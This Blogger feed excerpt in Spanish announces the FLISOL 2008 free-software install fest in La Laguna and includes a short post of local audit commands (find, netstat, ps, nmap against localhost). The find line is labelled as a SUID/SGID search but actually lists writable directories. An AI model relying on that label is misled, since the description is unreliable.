simultáneamente eventos en los que se instala de manera gratuita y totalmente legal, software libre en las computadoras que llevan los asistentes.<br /><br />Además de la instalación de software libre, se ofrecen charlas.<br /><br />El FLISOL 2008 se efectuará el día sábado 26 de abril en las instalaciones de la Universidad Autónoma de La Laguna -UAL-.<br /><br />Las pláticas se celebrarán en el Auditorio de la Universidad y el Taller de Instalación en el CIP. (checar imagen)<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.riveonline.com/data/phoo/2007_03_28/planoual.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 200px;" src="http://www.riveonline.com/data/phoo/2007_03_28/planoual.jpg" border="0" alt="" /></a><br /><br />El programa del evento iniciara con las siguientes pláticas:<br /><br />Propuestas:<br />10:00 "Introducción al Software Libre".- por José Antonio Martínez Torres (toNo) 11:00 "Demostración práctica de GNU/Linux".- por Guillermo Valdez Lozano (guivaloz)<br /><br />Para continuar al término de estas en el CIP con el Taller de instalación.<br /><br />¿Quién organiza el evento?<br /><br />La Comunidad de Software Libre en Latinoamérica, en el caso particular de La Laguna lo hace el Grupo de Usuarios de GNU/Linux de La Laguna -GULAG- conformado por personas de diversa índole, con el apoyo de otras entidades, principalmente educativas, y algunos patrocinadores del evento.<br /><br />¿A quién esta dirigido el evento?<br /><br />El evento está dirigido a todo público: estudiantes, académicos, trabajadores, entusiastas y aun personas que no poseen mucho conocimiento informático.<br /><br />Si posees o no conocimientos e intereses en informática, licencias, derecho de autor/copyright y demás áreas de la ciencia y la tecnología, déjate tentar, asiste y participa del evento. Nuestro objetivo es compartir conocimientos y ansias de libertad.<br /><br />¿Cuánto cuesta participar el evento?<br /><br />La asistencia al evento es totalmente libre y gratuita.<br /><br />¿Qué beneficios obtengo al asistir?<br /><br />Tendrás la oportunidad de instalar software libre en tu computadora, apreciar qué es una real y segura alternativa a otros modelos de desarrollo y distribución de software, informarte sobre la filosofía, cultura y organización alrededor del mismo.<br /><br />Tal vez encuentres una alternativa/solución en software libre para ti, tu empresa, colegio, universidad e, incluso, para tu gobierno. Podrás aclarar tus dudas acerca de los temas relacionados y quizás encuentres en el software libre, una alternativa de investigación, empleo y desarrollo tecnológico.<br /><br />¿Qué necesito llevar para la instalación?<br /><br />Tu equipo de computo, ya sea desktop o laptop, recomendamos que antes hagas una copia de seguridad de tu información importante -no nos hacemos responsables de la pérdida de información- y defragmentes tu disco duro.<br /><br />Es importante para los organizadores conocer cuántos equipos se llevaran al evento, por ese motivo te solicitamos que confirmes tu participación vía correo electrónico a las siguientes direcciones:<br /><br />flisol@gulag.org.mx<br /><br />En la sede tendremos disponibles las distribuciones Debian, Ubuntu, Fedora, Mandriva, Slackware, si deseas alguna distribución en especial favor de traerla contigo.<br /><br />Lleva cd's o dvd's vírgenes para que te lleves a tu casa los discos de la distribución que se te haya instalado.<br /><br />¡Deseos de aprender!<br /><br />Quiero ayudar ¿qué puedo hacer?<br /><br />Hay varias opciones para colaborar, contacta con nuestro coordinador local, y ofrece tu apoyo en alguno de estos puntos:<br /><br /> * Difusión<br /> * Patrocinio<br /> * Como Instalador<br /><br />Coordinador: César Eduardo Espino Quirarte ---> <a href="http://www.riveonline.com">RIVE</a><br />mail de contacto: cespinoq at gmail.com<br />¡Gracias por el interes y esperamos verlos en el FLISOL!<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-4904734557358883770?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-56824102088742672962008-04-20T16:43:00.000-05:002008-04-20T17:18:27.714-05:00find, netstat, ps, nmapFind SUID y SGID.<br />#find / -type d \( -perm -g+w -o -perm -o+w \) -exec ls -lad {} \;<br /><br />netstat.<br />#netstat -luntp<br /><br />ps.<br />#ps -ef <br /><br />nmap.<br /># nmap -sV localhost<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-5682410208874267296?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0